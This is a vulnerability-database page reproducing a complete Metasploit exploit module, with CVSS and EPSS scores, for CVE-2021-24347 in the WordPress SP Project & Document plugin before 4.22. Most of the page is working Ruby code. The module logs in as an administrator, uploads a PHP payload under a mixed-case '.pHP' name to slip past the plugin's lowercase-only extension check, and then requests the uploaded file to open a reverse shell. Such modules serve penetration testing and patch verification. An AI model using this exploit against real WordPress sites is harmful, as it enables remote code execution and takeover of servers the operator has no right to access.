Lucene search
Ron Jost, Yann Castel (yann.castel <Yann Castel ([email protected])>MSF:EXPLOIT-MULTI-HTTP-WP_PLUGIN_SP_PROJECT_DOCUMENT_RCE-HistoryJul 09, 2021 - 9:49 a.m.
Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution
2021-07-0909:49:53
Ron Jost, Yann Castel (yann.castel <Yann Castel ([email protected])>
www.rapid7.com
34
wordpress
plugin
sp project
document
authenticated
remote code execution
arbitrary file upload
vulnerability
lowercase file extensions
reverse shell
cve-2021-24347
CVSS2
6.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
CVSS3
8.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
0.971
Percentile
99.8%
This module allows an attacker with a privileged Wordpress account to launch a reverse shell due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22. The security check only searches for lowercase file extensions such as .php, making it possible to upload .pHP files for instance. Finally, the uploaded payload can be triggered by a call to /wp-content/uploads/sp-client-document-manager//.php
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution',
'Description' => %q{
This module allows an attacker with a privileged Wordpress account to launch a reverse shell
due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
The security check only searches for lowercase file extensions such as `.php`, making it possible to upload `.pHP` files for instance.
Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
},
'License' => MSF_LICENSE,
'Author' => [
'Ron Jost', # Exploit-db
'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
],
'References' => [
['EDB', '50115'],
['CVE', '2021-24347']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [
['Wordpress SP Project & Document < 4.22', {}]
],
'Privileged' => false,
'DisclosureDate' => '2021-06-14',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options [
OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
]
end
def check
return CheckCode::Unknown('Server not online or not detected as wordpress') unless wordpress_and_online?
cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
if cookie
check_plugin_version_from_readme('sp-client-document-manager', '4.22')
else
CheckCode::Detected('The admin credentials given are wrong !')
end
end
def get_user_id(cookie)
r = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
'Referer' => full_uri('/wp-admin/users.php'),
'vars_get' => {
'page' => 'sp-client-document-manager-fileview'
}
})
fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
user_id = r.body.to_s.match(%r{<option value='(\d+)'>#{datastore['USERNAME']}</option>})
fail_with(Failure::UnexpectedReply, "Can't find user id on plugin page") unless user_id && user_id[1]
user_id[1]
end
def exploit
cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
user_id = get_user_id(cookie)
payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"
post_data = Rex::MIME::Message.new
post_data.add_part(Rex::Text.rand_text_alpha(5..8), nil, nil, "form-data; name='cdm_upload_file_field'")
post_data.add_part("/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}", nil, nil, "form-data; name='_wp_http_referer'")
post_data.add_part('exploits', nil, nil, "form-data; name='dlg-upload-name'")
post_data.add_part('', 'application/octet-stream', nil, "form-data; name='dlg-upload-file[]'; filename=''")
post_data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name='dlg-upload-file[]'; filename='#{payload_name}'")
post_data.add_part('', nil, nil, "form-data; name='dlg-upload-notes'")
post_data.add_part('Upload', nil, nil, "form-data; name='sp-cdm-community-upload'")
print_status("Uploading file \'#{payload_name}\' containing the payload...")
r = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
'headers' => {
'Origin' => full_uri(''),
'Referer' => full_uri('wp-admin/admin.php')
},
'vars_get' => {
'page' => 'sp-client-document-manager-fileview',
'id' => user_id
},
'cookie' => cookie,
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
)
fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 302
register_files_for_cleanup(payload_name.downcase)
print_status('Triggering the payload ...')
send_request_cgi(
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase}")
)
end
end
Related
exploitdb
exploitdb
packetstorm
packetstorm
WordPress SP Project And Document Manager 4.21 Shell Upload
2021-07-08 00:00:00
WordPress SP Project And Document Remote Code Execution
2021-07-26 00:00:00
prion
prion
Code injection
2021-06-14 14:15:00
patchstack
patchstack
nuclei
nuclei
WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
2023-03-05 13:42:10
cvelist
cvelist
cve
cve
CVE-2021-24347
2021-06-14 14:15:08
nvd
nvd
CVE-2021-24347
2021-06-14 14:15:08
wpexploit
wpexploit
SP Project & Document Manager < 4.22 - Authenticated Shell Upload
2021-05-25 00:00:00
wpvulndb
wpvulndb
SP Project & Document Manager < 4.22 - Authenticated Shell Upload
2021-05-25 00:00:00
zdt
zdt
Wordpress SP Project & Document Manager 4.21 Plugin - Remote Code Execution Exploit
2021-07-08 00:00:00
WordPress SP Project And Document Remote Code Execution Exploit
2021-07-26 00:00:00
rapid7blog
rapid7blog
Metasploit Wrap-Up
2021-07-30 18:04:33
checkpoint_advisories
checkpoint_advisories
CVSS2
6.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
CVSS3
8.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
0.971
Percentile
99.8%
Related for MSF:EXPLOIT-MULTI-HTTP-WP_PLUGIN_SP_PROJECT_DOCUMENT_RCE-